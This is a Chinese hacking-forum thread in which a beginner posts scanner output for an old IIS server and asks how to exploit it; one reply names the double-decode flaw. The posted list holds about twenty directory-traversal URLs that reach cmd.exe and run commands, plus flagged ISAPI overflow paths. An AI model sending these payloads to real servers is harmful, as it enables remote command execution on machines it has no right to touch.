论坛: 菜鸟乐园 标题: 这个漏洞怎么利用? 复制本贴地址    
作者: cwenqiang [cwenqiang]    论坛用户   登录
[CGI漏洞]

/scripts/samples/search/qsumrhit.htw [漏洞描述] 
/scripts/samples/search/qfullhit.htw [漏洞描述] 
/null.ida [漏洞描述] 
/null.idq [漏洞描述] 
/abczxv.htw [漏洞描述] 
--------------------------------------------------------------------------------
[IIS漏洞]

/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 

/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 

可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞 

可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) 


地主 发表时间: 04/24 11:47
回复: qscy [qscy]   论坛用户   登录
IIS:二次解码漏洞,和UNICODE漏洞差不多


[此贴被 qscy(qscy) 在 04月24日12时23分 编辑过]

B1层 发表时间: 04/24 12:05
回复: cwenqiang [cwenqiang]   论坛用户   登录
哦~
还是不懂~
不会利用

B2层 发表时间: 04/24 12:13

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号